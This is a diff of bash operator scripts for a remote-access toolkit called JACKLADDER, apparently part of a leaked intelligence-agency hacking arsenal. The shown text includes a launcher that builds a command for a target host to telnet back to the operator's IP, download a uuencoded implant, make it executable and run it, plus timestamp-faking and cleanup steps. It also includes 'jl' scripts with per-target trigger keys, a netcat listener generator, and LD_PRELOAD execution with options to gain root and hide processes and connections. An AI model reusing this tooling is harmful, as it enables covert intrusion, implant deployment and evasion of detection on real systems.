echo $MINUSN "
|
||||||
|
Enter the IP of your actual target you are redirecting
|
||||||
|
through $REMOTEIP to get to (this is used here to echo
|
||||||
|
a jackpop command to paste into your redirector): [$DEFTARGETIP]"
|
||||||
|
read TA
|
||||||
|
[ "$TA" ] || TA=$DEFTARGETIP
|
||||||
|
fi
|
||||||
|
if [ ! "$TP" ] ; then
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the actual target's JL trigger port (this is used here
|
||||||
|
to echo a jackpop command to paste into your redirector): [$JLPORT] "
|
||||||
|
read TP
|
||||||
|
[ "$TP" ] || TP=$JLPORT
|
||||||
|
fi
|
||||||
|
if [ ! "$LP" ] ; then
|
||||||
|
LP=$RP
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ "$SA" ] ; then
|
||||||
|
if [ ! "$NOPENJACK" ] && [ ! "`ifconfig | grep $SA`" ] ; then
|
||||||
|
echo "Shouldn't SA=one of your IPs?
|
||||||
|
(you have SA=$SA)."
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
LOCAL_IP_GUESS=`ifconfig ppp0 2>/dev/null | grep inet | grep -v grep | grep -v ":127\." | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
# if that fails maybe it's on eth0
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || LOCAL_IP_GUESS=`ifconfig -a eth0 | grep inet | grep -v grep | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || echo "Unable to get local IP address..bailing"
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || exit 1
|
||||||
|
SA=$LOCAL_IP_GUESS
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
BASEDIR=`dirname "$TARGETDIR"`
|
||||||
|
|
||||||
|
BASEDIR2=`basename "$BASEDIR"`
|
||||||
|
|
||||||
|
# at this point DOCMD="" if we're doing usual mkdir/cd/etc, otherwise not
|
||||||
|
if [ ! "$DOCMD" ] && [ "$BASEDIR2" != "tmp" ] ; then
|
||||||
|
TOUCHSTUFF="
|
||||||
|
touch -r $BASEDIR /tmp/.advt$$"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ "$DOCMD" = "" ] ; then
|
||||||
|
if [ "$AUTOCMD" ] ; then
|
||||||
|
|
||||||
|
|
||||||
|
DOCMD=`packrat -a $LOCALPORT -E "${RAT_ARG}" -e -q -c -d $TARGETDIR -i $LOCALIP $RAT_FILE`
|
||||||
|
xterm -hold -e sh -c "packrat -a $LOCALPORT -E \"${RAT_ARG}\" -e -q -c -d $TARGETDIR -i $LOCALIP $RAT_FILE" &
|
||||||
|
sleep 5
|
||||||
|
else
|
||||||
|
DOCMD="
|
||||||
|
mkdir -p $TARGETDIR
|
||||||
|
cd $TARGETDIR || cd /tmp
|
||||||
|
telnet $LOCALIP $LOCALPORT | cat > $RAT_FILE.uu
|
||||||
|
uudecode $RAT_FILE.uu $UNCOMPRESS
|
||||||
|
chmod 777 $RAT_FILE
|
||||||
|
PATH=$TARGETDIR ${RAT_ARG}${RAT_FILE}"
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
REALCMD="PATH=$TARGETDIR:/tmp:/bin:/usr/bin:/sbin:/usr/sbin:/usr/bsd $TOUCHSTUFF ; sleep 3 ; $DOCMD
|
||||||
|
exit 0"
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo ""
|
||||||
|
echo "Running these commands on target:"
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo "REALCMD=\"$REALCMD\""
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
if [ "$JACKPOP" = 1 ] && [ ! "$NOPENJACK" ] ; then
|
||||||
|
echo "
|
||||||
|
Using jackpop with environment variables as follows:
|
||||||
|
Redirector Address RA=$RA
|
||||||
|
Redirector Port RP=$RP
|
||||||
|
Target Address TA=$TA
|
||||||
|
Target Port TP=$TP
|
||||||
|
Listening Port on RA LP=$LP
|
||||||
|
Source Address SA=$SA
|
||||||
|
|
||||||
|
Now, some pastables. First, the jackpop command you need to run in an
|
||||||
|
INCISION window on $RA, then the -rtun command in a NOPEN window
|
||||||
|
on the same box, and finally an rm command to wipe jackpop: "
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo "
|
||||||
|
chmod 700 jp&&netstat -an|grep $LP||PATH=. SA=$SA TA=$TA TP=$TP LP=$LP jp
|
||||||
|
|
||||||
|
rm jp ; ls -al ; ls -al jp
|
||||||
|
|
||||||
|
-rtun $LOCALPORT
|
||||||
|
"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
fi
|
||||||
|
if [ "$TOUCHSTUFF" ] ; then
|
||||||
|
$SETCOLOR_WARNING
|
||||||
|
echo "
|
||||||
|
Location for working directory $TARGETDIR is not tmp.
|
||||||
|
Will do \"touch -r $BASEDIR /tmp/.advt$$\". Do not forget to use
|
||||||
|
and then rm it when you BAIL.
|
||||||
|
"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
fi
|
||||||
|
echo "Command about to be executed:"
|
||||||
|
echo " ${INBLESS}jl.command telnet $REMOTEIP $JLPORT"
|
||||||
|
|
||||||
|
if [ ! "$NOPENJACK" ] ; then
|
||||||
|
$SETCOLOR_FAILURE
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
[ "$QUIET" ] || echo $MINUSN "hit enter to proceed, ^C to not: "
|
||||||
|
[ "$QUIET" ] || read junk
|
||||||
|
fi
|
||||||
|
|
||||||
|
#export these so jl.command sees them
|
||||||
|
export REALCMD
|
||||||
|
[ "$INBLESS" ] && export INBLESS
|
||||||
|
|
||||||
|
if [ "$DIDTHIS" ] ; then
|
||||||
|
echo -e "$DIDTHIS" >> /current/down/didthis
|
||||||
|
fi
|
||||||
|
|
||||||
|
#now run jackladder
|
||||||
|
|
||||||
|
jl.command telnet $REMOTEIP $JLPORT
|
304
archive_files/bin/jl
Executable file
304
archive_files/bin/jl
Executable file
|
@ -0,0 +1,304 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
origdir=$(pwd)
|
||||||
|
cd $(dirname $0)
|
||||||
|
PATH=$PATH:.:$origdir
|
||||||
|
|
||||||
|
##
|
||||||
|
## Global variables used.
|
||||||
|
##
|
||||||
|
|
||||||
|
## Set keys if you don't want to be prompted.
|
||||||
|
|
||||||
|
keys=jackladder20
|
||||||
|
|
||||||
|
keylist="
|
||||||
|
affine_caep
|
||||||
|
affine_ns_aero
|
||||||
|
affine_ns_cetin
|
||||||
|
affine_ns_north
|
||||||
|
affine_ns_space
|
||||||
|
aproncover_mgeo
|
||||||
|
applebar
|
||||||
|
atticfloor
|
||||||
|
beautysleep
|
||||||
|
bigsurf
|
||||||
|
bolivar_lazyday
|
||||||
|
changingwheel
|
||||||
|
crumpet
|
||||||
|
diablo
|
||||||
|
dillpill
|
||||||
|
dillpill_public
|
||||||
|
evenbreak
|
||||||
|
falsearch_jicom
|
||||||
|
featherbed
|
||||||
|
figureeight_inpbox
|
||||||
|
figureeight_tulip
|
||||||
|
goldentwig
|
||||||
|
golfstroke
|
||||||
|
iceskate
|
||||||
|
idletime
|
||||||
|
intonation_1
|
||||||
|
intonation_2
|
||||||
|
intonation_3
|
||||||
|
intonation_4
|
||||||
|
intonation_5
|
||||||
|
intonation_6
|
||||||
|
intonation_7
|
||||||
|
intonation_8
|
||||||
|
intonation_9
|
||||||
|
intonation_10
|
||||||
|
intonation_11
|
||||||
|
jackladder20
|
||||||
|
lazyday
|
||||||
|
mantlepiece
|
||||||
|
nailfile
|
||||||
|
operasong
|
||||||
|
patchpanel
|
||||||
|
picketline
|
||||||
|
quivertree
|
||||||
|
slateblack_up3
|
||||||
|
slateblack_up4
|
||||||
|
offeree
|
||||||
|
uniformwheel
|
||||||
|
stonecross
|
||||||
|
sudbury
|
||||||
|
subplot_nicnet
|
||||||
|
tiltop
|
||||||
|
treatypaper
|
||||||
|
treatypaper_server4
|
||||||
|
"
|
||||||
|
|
||||||
|
wd=$(pwd) # working directory
|
||||||
|
connect_so=$(type -path connect.so) # locate shared object connect.so
|
||||||
|
cmdln= # built in dooptions()
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
## Functions to setup the target's keys
|
||||||
|
## These functions export the environment variables
|
||||||
|
## needed by `jl' for operation.
|
||||||
|
## PRIME used for munging magic/port information
|
||||||
|
## INVPRIME used to retrieve munged info
|
||||||
|
## UTC_OFFSET target UTC adjustment
|
||||||
|
## expr $(date -u +%Y%j%H%M) - $(date -u +%Y%j%H%M)
|
||||||
|
## theirs ours
|
||||||
|
##
|
||||||
|
|
||||||
|
affine_caep() { export PRIME=59 INVPRIME=55539; }
|
||||||
|
affine_ns_aero() { export PRIME=41 INVPRIME=39961; }
|
||||||
|
affine_ns_cetin() { export PRIME=37 INVPRIME=7085; }
|
||||||
|
affine_ns_north() { export PRIME=31 INVPRIME=31711; }
|
||||||
|
applebar() { export PRIME=167 INVPRIME=42775; }
|
||||||
|
aproncover_mgeo() { export PRIME=151 INVPRIME=32551; }
|
||||||
|
atticfloor() { export PRIME=43271 INVPRIME=29879; }
|
||||||
|
beautysleep() { export PRIME=4253 INVPRIME=62901; }
|
||||||
|
bigsurf() { export PRIME=1129 INVPRIME=52185; }
|
||||||
|
bolivar_lazyday() { export PRIME=149 INVPRIME=51901; }
|
||||||
|
changingwheel() { export PRIME=41 INVPRIME=39961; }
|
||||||
|
crumpet() { export PRIME=1151 INVPRIME=47999; }
|
||||||
|
demo() { export PRIME=7 INVPRIME=28087; }
|
||||||
|
diablo() { export PRIME=131 INVPRIME=20011; }
|
||||||
|
dillpill() { export PRIME=71 INVPRIME=43383; }
|
||||||
|
dillpill_public() { export PRIME=79 INVPRIME=5807; }
|
||||||
|
evenbreak() { export PRIME=43 INVPRIME=48771; }
|
||||||
|
falsearch_jicom() { export PRIME=139 INVPRIME=26403; }
|
||||||
|
featherbed() { export PRIME=37693 INVPRIME=23573; }
|
||||||
|
figureeight_inpbox() { export PRIME=47 INVPRIME=18127; }
|
||||||
|
figureeight_tulip() { export PRIME=53 INVPRIME=21021; }
|
||||||
|
goldentwig() { export PRIME=97 INVPRIME=41889; }
|
||||||
|
golfstroke() { export PRIME=5591 INVPRIME=44519; } # IOTC
|
||||||
|
iceskate() { export PRIME=157 INVPRIME=34229; }
|
||||||
|
idletime() { export PRIME=103 INVPRIME=6999; }
|
||||||
|
intonation_1() { export PRIME=101 INVPRIME=45421; }
|
||||||
|
intonation_2() { export PRIME=83 INVPRIME=17371; }
|
||||||
|
intonation_3() { export PRIME=107 INVPRIME=44099; }
|
||||||
|
intonation_4() { export PRIME=109 INVPRIME=2405; }
|
||||||
|
intonation_5() { export PRIME=113 INVPRIME=49297; }
|
||||||
|
intonation_6() { export PRIME=179 INVPRIME=44667; }
|
||||||
|
intonation_7() { export PRIME=181 INVPRIME=60829; }
|
||||||
|
intonation_8() { export PRIME=191 INVPRIME=28479; }
|
||||||
|
intonation_9() { export PRIME=193 INVPRIME=36673; }
|
||||||
|
intonation_10() { export PRIME=197 INVPRIME=32269; }
|
||||||
|
intonation_11() { export PRIME=229 INVPRIME=48365; }
|
||||||
|
jackladder20() { return; } # uses builtin PRIME 20023, INVPRIME 51079
|
||||||
|
lazyday() { export PRIME=89 INVPRIME=18409; }
|
||||||
|
mantlepiece() { export PRIME=173 INVPRIME=25381; }
|
||||||
|
nailfile() { export PRIME=25469 INVPRIME=28117; }
|
||||||
|
operasong() { export PRIME=50929 INVPRIME=27153; }
|
||||||
|
patchpanel() { export PRIME=54059 INVPRIME=21379; }
|
||||||
|
picketline() { export PRIME=5119 INVPRIME=60415; }
|
||||||
|
quivertree() { export PRIME=61 INVPRIME=38677; }
|
||||||
|
slateblack_up3() { export PRIME=199 INVPRIME=49399; }
|
||||||
|
slateblack_up4() { export PRIME=211 INVPRIME=22363; }
|
||||||
|
stonecross() { export PRIME=239 INVPRIME=11791; }
|
||||||
|
sudbury() { export PRIME=233 INVPRIME=55129; }
|
||||||
|
offeree() { export PRIME=223 INVPRIME=47903; }
|
||||||
|
uniformwheel() { export PRIME=227 INVPRIME=17611; }
|
||||||
|
subplot_nicnet() { export PRIME=2663 INVPRIME=29015; }
|
||||||
|
tiltop() { export PRIME=73 INVPRIME=61945; }
|
||||||
|
treatypaper() { export PRIME=67 INVPRIME=19563; }
|
||||||
|
treatypaper_server4() { export PRIME=163 INVPRIME=45835; }
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
## Utility functions
|
||||||
|
##
|
||||||
|
|
||||||
|
setupkeys() {
|
||||||
|
local host=$1
|
||||||
|
|
||||||
|
case $host in
|
||||||
|
-help | --help | -h | -? | $0 ) usage;;
|
||||||
|
* )
|
||||||
|
if [ $keys ]; then
|
||||||
|
$keys
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "\t--- Select target keys ---"
|
||||||
|
echo
|
||||||
|
|
||||||
|
PS3=$(echo -e "\nkeys? ")
|
||||||
|
select keyinitfct in $keylist; do
|
||||||
|
if [ $keyinitfct ]; then
|
||||||
|
$keyinitfct
|
||||||
|
break
|
||||||
|
else
|
||||||
|
echo "Select a listed number."
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
ckupgrade() {
|
||||||
|
if [ ${O_PRIME:+1} ]; then
|
||||||
|
echo -n "Do you want to use the old keys? [n] "
|
||||||
|
read ans
|
||||||
|
if [ ${ans:-"n"} = "y" ]; then
|
||||||
|
export PRIME=$O_PRIME
|
||||||
|
export INVPRIME=$O_INVPRIME
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
dooptions() {
|
||||||
|
while [ $# -gt 0 ]; do
|
||||||
|
case $1 in
|
||||||
|
-o ) shift;
|
||||||
|
cmdln=$(echo "$cmdln UTC_OFFSET=$1 ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
-r ) cmdln=$(echo "$cmdln SU= ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
-s ) cmdln=$(echo "$cmdln HIDEME= ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
-t ) cmdln=$(echo "$cmdln HIDECON= ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
esac
|
||||||
|
cmdln=$(echo "$cmdln $1 ")
|
||||||
|
shift
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
echoenv() {
|
||||||
|
echo
|
||||||
|
echo "- Keys for $keys..."
|
||||||
|
echo " PRIME = $PRIME"
|
||||||
|
echo " INVPRIME = $INVPRIME"
|
||||||
|
[ ${O_PRIME:+1} ] && echo " O_PRIME = $O_PRIME"
|
||||||
|
[ ${O_INIVPRIME:+1} ] && echo " O_INVPRIME = $O_INVPRIME"
|
||||||
|
[ ${UTC_OFFSET:+1} ] && echo " UTC_OFFSET = $UTC_OFFSET"
|
||||||
|
echo
|
||||||
|
}
|
||||||
|
|
||||||
|
nc_script() {
|
||||||
|
cat << HERE > $wd/jl.nc
|
||||||
|
#!/bin/bash
|
||||||
|
echo "Use ^c twice to stop $0..."
|
||||||
|
echo " 1 for nc, 1 for while loop"
|
||||||
|
while true; do
|
||||||
|
port=\$RANDOM
|
||||||
|
echo
|
||||||
|
echo "---> Listening on \$port <---"
|
||||||
|
echo
|
||||||
|
echo \$port > $wd/.PORT
|
||||||
|
echo \$(tty) > $wd/.TTY
|
||||||
|
nc -l -p \$port
|
||||||
|
sleep 2
|
||||||
|
done
|
||||||
|
HERE
|
||||||
|
|
||||||
|
chmod +x $wd/jl.nc
|
||||||
|
}
|
||||||
|
|
||||||
|
usage() {
|
||||||
|
echo
|
||||||
|
echo "This is a JACKLADDER interface tool"
|
||||||
|
echo
|
||||||
|
echo "- Usage: jl <options> <tcp-based client cmd to target>"
|
||||||
|
echo " -o <min> Offset the date timestamp by <min> minutes"
|
||||||
|
echo " -r Contact incision and make process root"
|
||||||
|
echo " -s Contact incision and hide process"
|
||||||
|
echo " -t Contact incision and hide tcp connection"
|
||||||
|
echo
|
||||||
|
echo "- Run the following in a control window..."
|
||||||
|
echo " script -a typescript.\$(date +%Y%m%d)"
|
||||||
|
echo " $wd/jl.nc"
|
||||||
|
echo
|
||||||
|
echo "- Then, as an example, in a command window run..."
|
||||||
|
echo " $0 telnet target"
|
||||||
|
echo " remote cmd: ps -ef"
|
||||||
|
echo
|
||||||
|
echo " Note: $0 issues the \"remote cmd: \" prompt"
|
||||||
|
|
||||||
|
nc_script # generate the netcat script
|
||||||
|
|
||||||
|
if [ $keys ]; then
|
||||||
|
$keys
|
||||||
|
echoenv
|
||||||
|
fi
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
## Run the functions to setup the environment for JACKLADDER
|
||||||
|
##
|
||||||
|
|
||||||
|
eval targ=\${$#} # note: doesn't handle port arg at end of command line
|
||||||
|
setupkeys $targ
|
||||||
|
dooptions $@ # this function sets up the $cmdln variable
|
||||||
|
ckupgrade
|
||||||
|
|
||||||
|
#
|
||||||
|
# If PRIME is set, then use pre v2.0 trigger format.
|
||||||
|
#
|
||||||
|
if [ "$(echo $PRIME)" ]; then
|
||||||
|
connect_so=$(type -path connect12.so)
|
||||||
|
fi
|
||||||
|
|
||||||
|
#
|
||||||
|
# Get command to run on target.
|
||||||
|
#
|
||||||
|
if [ -x "$(command -v readcmd)" ]; then
|
||||||
|
histfile=${wd}/.jl_history
|
||||||
|
readcmd -h $histfile -p "remote cmd: "
|
||||||
|
cmd=$(tail -1 $histfile)
|
||||||
|
else
|
||||||
|
echo -n "remote cmd: "; read cmd
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo running: $cmd > $(cat .TTY)
|
||||||
|
echo
|
||||||
|
echo running: LD_PRELOAD=$connect_so CMD=\'$cmd\' PORT=$(cat $wd/.PORT) $cmdln
|
||||||
|
echo
|
||||||
|
|
||||||
|
eval LD_PRELOAD=$connect_so CMD="\$cmd" PORT=$(cat $wd/.PORT) $cmdln
|
315
archive_files/bin/jl.command
Executable file
315
archive_files/bin/jl.command
Executable file
|
@ -0,0 +1,315 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
origdir=$(pwd)
|
||||||
|
cd $(dirname $0)
|
||||||
|
PATH=$PATH:.:$origdir
|
||||||
|
|
||||||
|
##
|
||||||
|
## Global variables used.
|
||||||
|
##
|
||||||
|
|
||||||
|
## Set keys if you don't want to be prompted.
|
||||||
|
|
||||||
|
keys=jackladder20
|
||||||
|
|
||||||
|
keylist="
|
||||||
|
affine_caep
|
||||||
|
affine_ns_aero
|
||||||
|
affine_ns_cetin
|
||||||
|
affine_ns_north
|
||||||
|
affine_ns_space
|
||||||
|
aproncover_mgeo
|
||||||
|
applebar
|
||||||
|
atticfloor
|
||||||
|
beautysleep
|
||||||
|
bigsurf
|
||||||
|
bolivar_lazyday
|
||||||
|
changingwheel
|
||||||
|
crumpet
|
||||||
|
diablo
|
||||||
|
dillpill
|
||||||
|
dillpill_public
|
||||||
|
evenbreak
|
||||||
|
falsearch_jicom
|
||||||
|
featherbed
|
||||||
|
figureeight_inpbox
|
||||||
|
figureeight_tulip
|
||||||
|
goldentwig
|
||||||
|
golfstroke
|
||||||
|
iceskate
|
||||||
|
idletime
|
||||||
|
intonation_1
|
||||||
|
intonation_2
|
||||||
|
intonation_3
|
||||||
|
intonation_4
|
||||||
|
intonation_5
|
||||||
|
intonation_6
|
||||||
|
intonation_7
|
||||||
|
intonation_8
|
||||||
|
intonation_9
|
||||||
|
intonation_10
|
||||||
|
intonation_11
|
||||||
|
jackladder20
|
||||||
|
lazyday
|
||||||
|
mantlepiece
|
||||||
|
nailfile
|
||||||
|
operasong
|
||||||
|
patchpanel
|
||||||
|
picketline
|
||||||
|
quivertree
|
||||||
|
slateblack_up3
|
||||||
|
slateblack_up4
|
||||||
|
offeree
|
||||||
|
uniformwheel
|
||||||
|
stonecross
|
||||||
|
sudbury
|
||||||
|
subplot_nicnet
|
||||||
|
tiltop
|
||||||
|
treatypaper
|
||||||
|
treatypaper_server4
|
||||||
|
"
|
||||||
|
|
||||||
|
wd=$(pwd) # working directory
|
||||||
|
connect_so=$(type -path connect.so) # locate shared object connect.so
|
||||||
|
cmdln= # built in dooptions()
|
||||||
|
|
||||||
|
##
|
||||||
|
## Functions to setup the target's keys
|
||||||
|
## These functions export the environment variables
|
||||||
|
## needed by `jl' for operation.
|
||||||
|
## PRIME used for munging magic/port information
|
||||||
|
## INVPRIME used to retrieve munged info
|
||||||
|
## UTC_OFFSET target UTC adjustment
|
||||||
|
## expr $(date -u +%Y%j%H%M) - $(date -u +%Y%j%H%M)
|
||||||
|
## theirs ours
|
||||||
|
##
|
||||||
|
|
||||||
|
affine_caep() { export PRIME=59 INVPRIME=55539; }
|
||||||
|
affine_ns_aero() { return; } # uses builtin PRIME 20023, INVPRIME 51079
|
||||||
|
#affine_ns_aero() { export PRIME=41 INVPRIME=39961; }
|
||||||
|
affine_ns_cetin() { export PRIME=37 INVPRIME=7085; }
|
||||||
|
affine_ns_north() { export PRIME=31 INVPRIME=31711; }
|
||||||
|
applebar() { export PRIME=167 INVPRIME=42775; }
|
||||||
|
aproncover_mgeo() { export PRIME=151 INVPRIME=32551; }
|
||||||
|
atticfloor() { export PRIME=43271 INVPRIME=29879; }
|
||||||
|
beautysleep() { export PRIME=4253 INVPRIME=62901; }
|
||||||
|
bigsurf() { export PRIME=1129 INVPRIME=52185; }
|
||||||
|
bolivar_lazyday() { export PRIME=149 INVPRIME=51901; }
|
||||||
|
changingwheel() { export PRIME=41 INVPRIME=39961; }
|
||||||
|
crumpet() { export PRIME=1151 INVPRIME=47999; }
|
||||||
|
demo() { export PRIME=7 INVPRIME=28087; }
|
||||||
|
diablo() { export PRIME=131 INVPRIME=20011; }
|
||||||
|
dillpill() { export PRIME=71 INVPRIME=43383; }
|
||||||
|
dillpill_public() { export PRIME=79 INVPRIME=5807; }
|
||||||
|
evenbreak() { export PRIME=43 INVPRIME=48771; }
|
||||||
|
falsearch_jicom() { export PRIME=139 INVPRIME=26403; }
|
||||||
|
featherbed() { export PRIME=37693 INVPRIME=23573; }
|
||||||
|
figureeight_inpbox() { export PRIME=47 INVPRIME=18127; }
|
||||||
|
figureeight_tulip() { export PRIME=53 INVPRIME=21021; }
|
||||||
|
goldentwig() { export PRIME=97 INVPRIME=41889; }
|
||||||
|
golfstroke() { export PRIME=5591 INVPRIME=44519; } # IOTC
|
||||||
|
iceskate() { export PRIME=157 INVPRIME=34229; }
|
||||||
|
idletime() { export PRIME=103 INVPRIME=6999; }
|
||||||
|
intonation_1() { export PRIME=101 INVPRIME=45421; }
|
||||||
|
intonation_2() { export PRIME=83 INVPRIME=17371; }
|
||||||
|
intonation_3() { export PRIME=107 INVPRIME=44099; }
|
||||||
|
intonation_4() { export PRIME=109 INVPRIME=2405; }
|
||||||
|
intonation_5() { export PRIME=113 INVPRIME=49297; }
|
||||||
|
intonation_6() { export PRIME=179 INVPRIME=44667; }
|
||||||
|
intonation_7() { export PRIME=181 INVPRIME=60829; }
|
||||||
|
intonation_8() { export PRIME=191 INVPRIME=28479; }
|
||||||
|
intonation_9() { export PRIME=193 INVPRIME=36673; }
|
||||||
|
intonation_10() { export PRIME=197 INVPRIME=32269; }
|
||||||
|
intonation_11() { export PRIME=229 INVPRIME=48365; }
|
||||||
|
jackladder20() { return; } # uses builtin PRIME 20023, INVPRIME 51079
|
||||||
|
lazyday() { export PRIME=89 INVPRIME=18409; }
|
||||||
|
mantlepiece() { export PRIME=173 INVPRIME=25381; }
|
||||||
|
nailfile() { export PRIME=25469 INVPRIME=28117; }
|
||||||
|
operasong() { export PRIME=50929 INVPRIME=27153; }
|
||||||
|
patchpanel() { export PRIME=54059 INVPRIME=21379; }
|
||||||
|
picketline() { export PRIME=5119 INVPRIME=60415; }
|
||||||
|
quivertree() { export PRIME=61 INVPRIME=38677; }
|
||||||
|
slateblack_up3() { export PRIME=199 INVPRIME=49399; }
|
||||||
|
slateblack_up4() { export PRIME=211 INVPRIME=22363; }
|
||||||
|
stonecross() { export PRIME=239 INVPRIME=11791; }
|
||||||
|
sudbury() { export PRIME=233 INVPRIME=55129; }
|
||||||
|
offeree() { export PRIME=223 INVPRIME=47903; }
|
||||||
|
uniformwheel() { export PRIME=227 INVPRIME=17611; }
|
||||||
|
subplot_nicnet() { export PRIME=2663 INVPRIME=29015; }
|
||||||
|
#tiltop() { export PRIME=73 INVPRIME=61945; }
|
||||||
|
tiltop() { return; } # uses builtin PRIME 20023, INVPRIME 51079
|
||||||
|
treatypaper() { export PRIME=67 INVPRIME=19563; }
|
||||||
|
treatypaper_server4() { export PRIME=163 INVPRIME=45835; }
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
## Utility functions
|
||||||
|
##
|
||||||
|
|
||||||
|
setupkeys() {
|
||||||
|
local host=$1
|
||||||
|
|
||||||
|
case $host in
|
||||||
|
-help | --help | -h | -? | $0 ) usage;;
|
||||||
|
* )
|
||||||
|
if [ $keys ]; then
|
||||||
|
$keys
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "\t--- Select target keys ---"
|
||||||
|
echo
|
||||||
|
|
||||||
|
PS3=$(echo -e "\nkeys? ")
|
||||||
|
select keyinitfct in $keylist; do
|
||||||
|
if [ $keyinitfct ]; then
|
||||||
|
$keyinitfct
|
||||||
|
break
|
||||||
|
else
|
||||||
|
echo "Select a listed number."
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
ckupgrade() {
|
||||||
|
if [ ${O_PRIME:+1} ]; then
|
||||||
|
echo -n "Do you want to use the old keys? [n] "
|
||||||
|
read ans
|
||||||
|
if [ ${ans:-"n"} = "y" ]; then
|
||||||
|
export PRIME=$O_PRIME
|
||||||
|
export INVPRIME=$O_INVPRIME
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
dooptions() {
|
||||||
|
while [ $# -gt 0 ]; do
|
||||||
|
case $1 in
|
||||||
|
-o ) shift;
|
||||||
|
cmdln=$(echo "$cmdln UTC_OFFSET=$1 ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
-r ) cmdln=$(echo "$cmdln SU= ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
-s ) cmdln=$(echo "$cmdln HIDEME= ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
-t ) cmdln=$(echo "$cmdln HIDECON= ");
|
||||||
|
shift;
|
||||||
|
continue ;;
|
||||||
|
esac
|
||||||
|
cmdln=$(echo "$cmdln $1 ")
|
||||||
|
shift
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
echoenv() {
|
||||||
|
echo
|
||||||
|
echo "- Keys for $keys..."
|
||||||
|
echo " PRIME = $PRIME"
|
||||||
|
echo " INVPRIME = $INVPRIME"
|
||||||
|
[ ${O_PRIME:+1} ] && echo " O_PRIME = $O_PRIME"
|
||||||
|
[ ${O_INIVPRIME:+1} ] && echo " O_INVPRIME = $O_INVPRIME"
|
||||||
|
[ ${UTC_OFFSET:+1} ] && echo " UTC_OFFSET = $UTC_OFFSET"
|
||||||
|
echo
|
||||||
|
}
|
||||||
|
|
||||||
|
nc_script() {
|
||||||
|
cat << HERE > $wd/jl.nc
|
||||||
|
#!/bin/bash
|
||||||
|
echo "Use ^c twice to stop $0..."
|
||||||
|
echo " 1 for nc, 1 for while loop"
|
||||||
|
while true; do
|
||||||
|
port=\$RANDOM
|
||||||
|
echo
|
||||||
|
echo "---> Listening on \$port <---"
|
||||||
|
echo
|
||||||
|
echo \$port > $wd/.PORT
|
||||||
|
echo \$(tty) > $wd/.TTY
|
||||||
|
nc -l -p \$port
|
||||||
|
sleep 2
|
||||||
|
done
|
||||||
|
HERE
|
||||||
|
|
||||||
|
chmod +x $wd/jl.nc
|
||||||
|
}
|
||||||
|
|
||||||
|
usage() {
|
||||||
|
echo
|
||||||
|
echo "This is a JACKLADDER interface tool"
|
||||||
|
echo
|
||||||
|
echo "- Usage: jl <options> <tcp-based client cmd to target>"
|
||||||
|
echo " -o <min> Offset the date timestamp by <min> minutes"
|
||||||
|
echo
|
||||||
|
echo "- Run the following in a control window..."
|
||||||
|
echo " script -a typescript.\$(date +%Y%m%d)"
|
||||||
|
echo " $wd/jl.nc"
|
||||||
|
echo
|
||||||
|
echo "- Then, as an example, in a command window run..."
|
||||||
|
echo " $0 telnet target"
|
||||||
|
echo " remote cmd: ps -ef"
|
||||||
|
echo
|
||||||
|
echo " Note: $0 issues the \"remote cmd: \" prompt"
|
||||||
|
|
||||||
|
nc_script # generate the netcat script
|
||||||
|
|
||||||
|
if [ $keys ]; then
|
||||||
|
$keys
|
||||||
|
echoenv
|
||||||
|
fi
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
## Run the functions to setup the environment for JACKLADDER
|
||||||
|
##
|
||||||
|
